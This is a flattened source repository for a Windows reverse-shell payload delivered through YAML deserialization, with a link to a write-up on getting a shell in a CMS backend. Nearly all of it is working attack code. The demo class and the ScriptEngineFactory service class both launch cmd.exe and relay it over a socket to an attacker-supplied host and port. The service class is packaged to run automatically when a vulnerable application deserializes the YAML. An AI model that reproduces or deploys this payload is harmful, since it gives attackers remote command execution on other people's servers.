├── README.md ├── demo.java └── yaml-payload-master └── src ├── META-INF └── services │ └── javax.script.ScriptEngineFactory └── artsploit ├── AwesomeScriptEngineFactory.class └── AwesomeScriptEngineFactory.java /README.md: -------------------------------------------------------------------------------- 1 | # yaml-payload-for-Win 2 | 用于windows反弹shell的yaml-payload 3 | [https://bkfish.gitee.io/2021/06/26/%E8%AE%B0%E4%B8%80%E6%AC%A1%E8%8B%A5%E4%BE%9Dcms%E5%90%8E%E5%8F%B0getshell/](https://bkfish.gitee.io/2021/06/26/%E8%AE%B0%E4%B8%80%E6%AC%A1%E8%8B%A5%E4%BE%9Dcms%E5%90%8E%E5%8F%B0getshell/) -------------------------------------------------------------------------------- /demo.java: -------------------------------------------------------------------------------- 1 | public class demo { 2 | public static void main(String[] args) throws java.io.IOException, InterruptedException { 3 | String host="xxx"; 4 | int port=port; 5 | String cmd="cmd.exe"; 6 | Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); 7 | java.net.Socket s=new java.net.Socket(host,port); 8 | java.io.InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); 9 | java.io.OutputStream po=p.getOutputStream(),so=s.getOutputStream(); 10 | while(!s.isClosed()) { 11 | while(pi.available()>0) { 12 | so.write(pi.read()); 13 | } 14 | while(pe.available()>0) { 15 | so.write(pe.read()); 16 | } 17 | while(si.available()>0) { 18 | po.write(si.read()); 19 | } 20 | so.flush(); 21 | po.flush(); 22 | Thread.sleep(50); 23 | try { 24 | p.exitValue(); 25 | break; 26 | } 27 | catch (Exception e){ 28 | } 29 | }; 30 | p.destroy(); 31 | s.close(); 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /yaml-payload-master/src/META-INF/services/javax.script.ScriptEngineFactory: -------------------------------------------------------------------------------- 1 | artsploit.AwesomeScriptEngineFactory -------------------------------------------------------------------------------- /yaml-payload-master/src/artsploit/AwesomeScriptEngineFactory.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bkfish/yaml-payload-for-Win/a9869eaedbda3a3814c2be230d09ced4d8a16934/yaml-payload-master/src/artsploit/AwesomeScriptEngineFactory.class -------------------------------------------------------------------------------- /yaml-payload-master/src/artsploit/AwesomeScriptEngineFactory.java: -------------------------------------------------------------------------------- 1 | package artsploit; 2 | 3 | import javax.script.ScriptEngine; 4 | import javax.script.ScriptEngineFactory; 5 | import java.io.IOException; 6 | import java.util.List; 7 | 8 | public class AwesomeScriptEngineFactory implements ScriptEngineFactory { 9 | 10 | public AwesomeScriptEngineFactory() throws java.io.IOException, InterruptedException { 11 | try { 12 | 13 | String host="ip"; 14 | int port=port; 15 | String cmd="cmd.exe"; 16 | Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); 17 | java.net.Socket s=new java.net.Socket(host,port); 18 | java.io.InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); 19 | java.io.OutputStream po=p.getOutputStream(),so=s.getOutputStream(); 20 | while(!s.isClosed()) { 21 | while(pi.available()>0) { 22 | so.write(pi.read()); 23 | } 24 | while(pe.available()>0) { 25 | so.write(pe.read()); 26 | } 27 | while(si.available()>0) { 28 | po.write(si.read()); 29 | } 30 | so.flush(); 31 | po.flush(); 32 | Thread.sleep(50); 33 | try { 34 | p.exitValue(); 35 | break; 36 | } 37 | catch (Exception e){ 38 | } 39 | }; 40 | p.destroy(); 41 | s.close(); 42 | } catch (IOException e) { 43 | e.printStackTrace(); 44 | } 45 | } 46 | 47 | @Override 48 | public String getEngineName() { 49 | return null; 50 | } 51 | 52 | @Override 53 | public String getEngineVersion() { 54 | return null; 55 | } 56 | 57 | @Override 58 | public List getExtensions() { 59 | return null; 60 | } 61 | 62 | @Override 63 | public List getMimeTypes() { 64 | return null; 65 | } 66 | 67 | @Override 68 | public List getNames() { 69 | return null; 70 | } 71 | 72 | @Override 73 | public String getLanguageName() { 74 | return null; 75 | } 76 | 77 | @Override 78 | public String getLanguageVersion() { 79 | return null; 80 | } 81 | 82 | @Override 83 | public Object getParameter(String key) { 84 | return null; 85 | } 86 | 87 | @Override 88 | public String getMethodCallSyntax(String obj, String m, String... args) { 89 | return null; 90 | } 91 | 92 | @Override 93 | public String getOutputStatement(String toDisplay) { 94 | return null; 95 | } 96 | 97 | @Override 98 | public String getProgram(String... statements) { 99 | return null; 100 | } 101 | 102 | @Override 103 | public ScriptEngine getScriptEngine() { 104 | return null; 105 | } 106 | } 107 | --------------------------------------------------------------------------------